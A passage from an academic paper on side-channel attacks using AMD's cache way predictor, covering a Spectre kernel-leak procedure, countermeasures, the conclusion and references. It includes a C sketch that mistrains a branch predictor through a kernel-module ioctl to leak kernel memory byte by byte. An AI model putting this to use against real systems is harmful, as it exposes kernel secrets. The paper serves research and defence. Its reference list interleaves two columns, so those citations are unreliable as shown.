The execution of the presented code snippet can be triggered with an ioctl command that allows the user to control the index variable as it is passed as an argument. First, we mistrain the branch predictor by repeatedly providing an index that is in bounds, letting the processor follow the branch to access a fixed kernel-memory location. Then, we access an address that collides with the kernel address accessed based on a possible byte-value located at data[index]. By providing an out-of-bounds index, the processor
now speculatively accesses a memory location based on the secret data located at the out-of-bounds index. Using Collide+Probe, we can now detect if the kernel has accessed the address based on the assumed secret byte value. By repeating this step for each of the 256 possible byte values, we can deduce the actual byte as we observe µTag conflicts. As we cannot ensure that the processor always misspeculates when providing the out-of-bounds index, we run this attack multiple times for each byte we want to leak.

[Figure: two 16×16 matrices of measured values for addresses 0x186800 to 0x186bc0 (axis label: Address), with markedly higher entries on the diagonal; only the raw numbers survived extraction.]
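Putting these steps together, one leak iteration could be structured as in the following C sketch. The ioctl command number, the retry count, and the helpers collide() and probe() (which perform the two Collide+Probe phases on a user-space address colliding with LUT + guess * 4096) are hypothetical placeholders; the paper does not publish this driver code.

    #include <stdint.h>
    #include <sys/ioctl.h>

    extern int  spectre_fd;          /* fd of our vulnerable kernel module */
    extern void collide(int guess);  /* access address colliding with LUT+guess*4096 */
    extern int  probe(int guess);    /* timed re-access: 1 on µTag conflict */
    #define CMD_GADGET 0             /* hypothetical ioctl command number */
    #define RETRIES    100

    /* Leak one byte at out-of-bounds index `target` (cf. Section 5.3). */
    static uint8_t leak_byte(long target) {
        int hits[256] = { 0 };
        for (int r = 0; r < RETRIES; r++) {
            for (int guess = 0; guess < 256; guess++) {
                for (int i = 0; i < 10; i++)            /* mistrain: in bounds */
                    ioctl(spectre_fd, CMD_GADGET, 0L);
                collide(guess);                         /* Collide phase */
                ioctl(spectre_fd, CMD_GADGET, target);  /* transient access */
                hits[guess] += probe(guess);            /* Probe phase */
            }
        }
        int best = 0;                /* most frequent conflict wins */
        for (int guess = 1; guess < 256; guess++)
            if (hits[guess] > hits[best]) best = guess;
        return (uint8_t)best;
    }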
7 COUNTERMEASURES

In this section, we discuss mitigations to the presented attacks on AMD's way predictor. We first discuss hardware-only mitigations, followed by mitigations requiring hardware and software changes, as well as a software-only solution.

Temporarily Disable Way Predictor. One solution lies in designing the processor in a way that allows disabling the way predictor temporarily. Alves et al. [4] evaluated the performance penalty of instruction replays caused by mispredictions. By dynamically disabling way prediction, they observe a higher performance than with standard way prediction. Dynamically disabling way prediction can also be used to prevent attacks by disabling it if too many mispredictions within a defined time window are detected. If an adversary tries to exploit the way predictor or if the current legitimate workload provokes too many conflicts, the processor deactivates the way predictor and falls back to comparing the tags from all ways. However, it is unknown whether AMD processors support this in hardware, and there is no documented operating-system interface to it.

Keyed Hash Function. The currently used mapping functions (Section 3) rely solely on bits of the virtual address. This allows an attacker to reverse-engineer the used function once and easily find colliding virtual addresses resulting in the same µTag. By keying the mapping function with an additional process- or context-dependent secret input, a reverse-engineered hash function is only valid for the attacker process. ScatterCache [77] and CEASER-S [61] are novel cache designs preventing cache attacks by introducing a similar keyed mapping function for skewed-associative caches. Hence, we expect that such methods are also effective when used for the way predictor. Moreover, the key can be updated regularly, e.g., when returning from the kernel, and, thus, not remain the same over the execution time of the program.

State Flushing. With Collide+Probe, an attacker cannot monitor memory accesses of a victim running on a sibling thread. However, µTag collisions can still be observed after context switches or transitions between kernel and user mode. To mitigate Collide+Probe, the state of the way predictor can be cleared when switching to another user-space application or returning from the kernel. Every subsequent memory access yields a misprediction and is thus served from the L2 data cache. This yields the same result as invalidating the L1 data cache, which is currently a required mitigation technique against Foreshadow [74] and MDS attacks [16, 68, 75]. However, we expect it to be more power-efficient than flushing the L1D. To mitigate Spectre attacks [41, 44, 51], it is already necessary to invalidate branch predictors upon context switches [17]. As invalidating predictors and the L1D cache on Intel has been implemented through CPU microcode updates, introducing an MSR to invalidate the way predictor might be possible on AMD as well.

Uniformly-distributed Collisions. While the previously described countermeasures rely on either microcode updates or hardware modifications, we also propose an entirely software-based mitigation. Our attack on an optimized AES T-table implementation in Section 5.4 relies on the fact that an attacker can observe the key-dependent look-ups to the T-tables. We propose to map such secret data n times, such that the data is accessible via n different virtual addresses, which all have a different µTag. When accessing the data, a random address is chosen out of the n possible addresses. The attacker cannot learn which T-table has been accessed by monitoring the accessed µTags, as a uniform distribution over all possibilities will be observed. This technique is not restricted to T-table implementations but can be applied to virtually any secret-dependent memory access within an application. With dynamic software diversity [19], diversified replicas of program parts are generated automatically to thwart cache side-channel attacks.
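A user-space sketch of this idea in C, with n = 8 chosen arbitrarily: in a real implementation, the n mappings would alias the same physical pages (e.g., via a shared file mapping) and be placed at virtual addresses with pairwise different µTags; plain anonymous copies stand in for that placement here.

    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/mman.h>

    #define COPIES 8    /* n in the text; chosen here for illustration */

    /* Make the secret table reachable via n virtual addresses with
     * different µTags; pick one mapping at random on every access. */
    struct diversified {
        uint8_t *copy[COPIES];
        size_t   size;
    };

    static int diversify(struct diversified *d, const uint8_t *secret, size_t size) {
        d->size = size;
        for (int i = 0; i < COPIES; i++) {
            d->copy[i] = mmap(NULL, size, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (d->copy[i] == MAP_FAILED)
                return -1;
            memcpy(d->copy[i], secret, size);
        }
        return 0;
    }

    static uint8_t lookup(const struct diversified *d, size_t index) {
        return d->copy[rand() % COPIES][index];   /* uniform over all µTags */
    }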
8 CONCLUSION

The key takeaway of this paper is that AMD's cache way predictors leak secret information. To understand the implementation details, we reverse engineered AMD's L1D cache way predictor, leading to two novel side-channel attack techniques. First, Collide+Probe allows monitoring memory accesses on the current logical core without the knowledge of physical addresses or shared memory. Second, Load+Reload obtains accurate memory-access traces of applications co-located on the same physical core.

We evaluated our new attack techniques in different scenarios. We established a high-speed covert channel and utilized it in a Spectre attack to leak secret data from the kernel. Furthermore, we reduced the entropy of different ASLR implementations from native code and sandboxed JavaScript. Finally, we recovered a key from a vulnerable AES implementation.

Our attacks demonstrate that AMD's design is vulnerable to side-channel attacks. However, we propose countermeasures in software and hardware, allowing to secure existing implementations and future designs of way predictors.

ACKNOWLEDGMENTS

We thank our anonymous reviewers for their comments and suggestions that helped improving the paper. The project was supported by the Austrian Research Promotion Agency (FFG) via the K-project DeSSnet, which is funded in the context of COMET - Competence Centers for Excellent Technologies by BMVIT, BMWFW, Styria, and Carinthia. It was also supported by the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation programme (grant agreement No 681402). This work also benefited from the support of the project ANR-19-CE39-0007 MIAOUS of the French National Research Agency (ANR). Additional funding was provided by generous gifts from Intel. Any opinions, findings, and conclusions or recommendations expressed in this paper are those of the authors and do not necessarily reflect the views of the funding parties.

REFERENCES

[1] Andreas Abel and Jan Reineke. 2013. Measurement-based Modeling of the Cache Replacement Policy. In Real-Time and Embedded Technology and Applications Symposium (RTAS).
[2] Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García, and Nicola Tuveri. 2018. Port Contention for Fun and Profit. In S&P.
[3] Alex Christensen. 2015. Reduce resolution of performance.now. https://bugs.webkit.org/show_bug.cgi?id=146531
[4] Ricardo Alves, Stefanos Kaxiras, and David Black-Schaffer. 2018. Dynamically disabling way-prediction to reduce instruction replay. In International Conference on Computer Design (ICCD).
[5] AMD. 2013. BIOS and Kernel Developer’s Guide (BKDG) for AMD Family 15h [40] Richard E Kessler. 1999. The alpha 21264 microprocessor. IEEE Micro (1999).
Models 00h-0Fh Processors. [41] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas,
[6] AMD. 2014. Software Optimization Guide for AMD Family 15h Processors. Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz,
[7] AMD. 2017. AMD64 Architecture Programmer’s Manual. and Yuval Yarom. 2019. Spectre Attacks: Exploiting Speculative Execution. In
[8] AMD. 2017. Software Optimization Guide for AMD Family 17h Processors. S&P.
[9] AMD. 2018. Software techniques for managing speculation on AMD processors. [42] Paul C. Kocher. 1996. Timing Attacks on Implementations of Diffe-Hellman, RSA,
[10] AMD. 2019. 2nd Gen AMD EPYC Processors Set New Standard for the Modern DSS, and Other Systems. In CRYPTO.
Datacenter with Record-Breaking Performance and Significant TCO Savings. [43] Robert Könighofer. 2008. A Fast and Cache-Timing Resistant Implementation of
[11] Antonio Barresi, Kaveh Razavi, Mathias Payer, and Thomas R. Gross. 2015. CAIN: the AES. In CT-RSA.
Silently Breaking ASLR in the Cloud. In WOOT. [44] Esmaeil Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and Nael
[12] Daniel J. Bernstein. 2004. Cache-Timing Attacks on AES. Abu-Ghazaleh. 2018. Spectre Returns! Speculation Attacks using the Return
[13] Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessan- Stack Buffer. In WOOT.
dro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTher- [45] Marcin Krzyzanowski. 2019. CryptoSwift: Growing collection of standard and
Spectre: exploiting speculative execution through port contention. In CCS. secure cryptographic algorithms implemented in Swift. https://cryptoswift.io
[14] Boris Zbarsky. 2015. Reduce resolution of performance.now. https://hg.mozilla. [46] Linux. 2019. Complete virtual memory map with 4-level page tables. https:
org/integration/mozilla-inbound/rev/48ae8b5e62ab //www.kernel.org/doc/Documentation/x86/x86_64/mm.txt
[15] Leon Groot Bruinderink, Andreas Hülsing, Tanja Lange, and Yuval Yarom. 2016. [47] Linux. 2019. Linux Kernel 5.0 Process (x86). https://git.kernel.org/pub/scm/
Flush, Gauss, and Reload–a cache attack on the BLISS lattice-based signature linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/process.c
scheme. In CHES. [48] Moritz Lipp, Daniel Gruss, Raphael Spreitzer, Clémentine Maurice, and Stefan
[16] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Ma- Mangard. 2016. ARMageddon: Cache Attacks on Mobile Devices. In USENIX
rina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Security Symposium.
Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking Data on Meltdown-resistant [49] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas,
CPUs. In CCS. Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval
[17] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Yarom, and Mike Hamburg. 2018. Meltdown: Reading Kernel Memory from User
Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A Space. In USENIX Security Symposium.
Systematic Evaluation of Transient Execution Attacks and Defenses. In USENIX [50] Fangfei Liu, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. 2015. Last-
Security Symposium. Level Cache Side-Channel Attacks are Practical. In S&P.
[18] Mike Clark. 2016. A new x86 core architecture for the next generation of com- [51] G. Maisuradze and C. Rossow. 2018. ret2spec: Speculative Execution Using Return
puting. In IEEE Hot Chips Symposium (HCS). Stack Buffers. In CCS.
[19] Stephen Crane, Andrei Homescu, Stefan Brunthaler, Per Larsen, and Michael [52] Clémentine Maurice, Nicolas Le Scouarnec, Christoph Neumann, Olivier Heen,
Franz. 2015. Thwarting Cache Side-Channel Attacks Through Dynamic Software and Aurélien Francillon. 2015. Reverse Engineering Intel Complex Addressing
Diversity. In NDSS. Using Performance Counters. In RAID.
[20] Joan Daemen and Vincent Rijmen. 2013. The design of Rijndael: AES-the advanced [53] Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss,
encryption standard. Carlo Alberto Boano, Stefan Mangard, and Kay Römer. 2017. Hello from the
[21] Helder Eijs. 2018. PyCryptodome: A self-contained cryptographic library for Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS.
Python. https://www.pycryptodome.org [54] Ahmad Moghimi, Gorka Irazoqui, and Thomas Eisenbarth. 2017. CacheZoom:
[22] Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2016. Jump How SGX Amplifies The Power of Cache Attacks. In CHES.
over ASLR: Attacking branch predictors to bypass ASLR. In MICRO. [55] Richard Moore. 2017. pyaes: Pure-Python implementation of AES block-cipher
[23] W. Shen Gene and S. Craig Nelson. 2006. MicroTLB and micro tag for reducing and common modes of operation. https://github.com/ricmoo/pyaes
power in a processor . US Patent 7,117,290 B2. [56] Louis-Marie Vincent Mouton, Nicolas Jean Phillippe Huot, Gilles Eric Grandou,
[24] Ben Gras, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2018. Translation and Stephane Eric Sebastian Brochier. 2012. Cache accessing using a micro TAG.
Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks. US Patent 8,151,055.
In USENIX Security Symposium. [57] Yossef Oren, Vasileios P Kemerlis, Simha Sethumadhavan, and Angelos D
[25] Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, and Cristiano Giuffrida. 2017. Keromytis. 2015. The Spy in the Sandbox: Practical Cache Attacks in JavaScript
ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS. and their Implications. In CCS.
[26] William Gropp, Ewing Lusk, Nathan Doss, and Anthony Skjellum. 1996. A high- [58] Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache Attacks and Coun-
performance, portable implementation of the MPI message passing interface termeasures: the Case of AES. In CT-RSA.
standard. Parallel computing (1996). [59] Colin Percival. 2005. Cache missing for fun and profit. In BSDCan.
[27] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, [60] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, and Stefan
and Stefan Mangard. 2017. KASLR is Dead: Long Live KASLR. In ESSoS. Mangard. 2016. DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.
[28] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Man- In USENIX Security Symposium.
gard. 2016. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. [61] Moinuddin K Qureshi. 2019. New attacks and defense for encrypted-address
In CCS. cache. In ISCA.
[29] Daniel Gruss, Clémentine Maurice, and Stefan Mangard. 2016. Rowhammer.js: A [62] Chester Rebeiro, A. David Selvakumar, and A. S. L. Devi. 2006. Bitslice Imple-
Remote Software-Induced Fault Attack in JavaScript. In DIMVA. mentation of AES. In Cryptology and Network Security (CANS).
[30] Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. 2016. [63] Thomas Ristenpart, Eran Tromer, Hovav Shacham, and Stefan Savage. 2009.
Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA. Hey, You, Get Off of My Cloud: Exploring Information Leakage in Third-Party
[31] Daniel Gruss, Raphael Spreitzer, and Stefan Mangard. 2015. Cache Template Compute Clouds. In CCS.
Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security [64] David J Sager and Glenn J Hinton. 2002. Way-predicting cache memory. US
Symposium. Patent 6,425,055.
[32] Shay Gueron. 2012. Intel Advanced Encryption Standard (Intel AES) Instructions [65] Michael Schwarz, Claudio Canella, Lukas Giner, and Daniel Gruss. 2019. Store-to-
Set – Rev 3.01. Leak Forwarding: Leaking Data on Meltdown-resistant CPUs. arXiv:1905.05725
[33] Richard W Hamming. 1950. Error detecting and error correcting codes. The Bell (2019).
system technical journal (1950). [66] Michael Schwarz, Daniel Gruss, Samuel Weiser, Clémentine Maurice, and Stefan
[34] Joel Hruska. 2019. AMD Gains Market Share in Desktop and Laptop, Slips in Mangard. 2017. Malware Guard Extension: Using SGX to Conceal Cache Attacks.
Servers. https://www.extremetech.com/computing/291032-amd In DIMVA.
[35] Ralf Hund, Carsten Willems, and Thorsten Holz. 2013. Practical Timing Side [67] Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser, Clémentine Maurice,
Channel Attacks against Kernel Space ASLR. In S&P. Raphael Spreitzer, and Stefan Mangard. 2018. KeyDrown: Eliminating Software-
[36] Koji Inoue, Tohru Ishihara, and Kazuaki Murakami. 1999. Way-predicting set- Based Keystroke Timing Side-Channel Attacks. In NDSS.
associative cache for high performance and low energy consumption. In Sympo- [68] Michael Schwarz, Moritz Lipp, Daniel Moghimi, Jo Van Bulck, Julian Steck-
sium on Low Power Electronics and Design. lina, Thomas Prescher, and Daniel Gruss. 2019. ZombieLoad: Cross-Privilege-
[37] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2015. S$A: A Shared Cache Boundary Data Sampling. In CCS.
Attack that Works Across Cores and Defies VM Sandboxing – and its Application [69] Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard. 2017.
to AES. In S&P. Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural
[38] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache Attacks in JavaScript. In FC.
attacks. In AsiaCCS. [70] Michael Schwarz, Martin Schwarzl, Moritz Lipp, and Daniel Gruss. 2019. Net-
[39] Yeongjin Jang, Sangho Lee, and Taesoo Kim. 2016. Breaking Kernel Address Spectre: Read Arbitrary Memory over Network. In ESORICS.
Space Layout Randomization with Intel TSX. In CCS.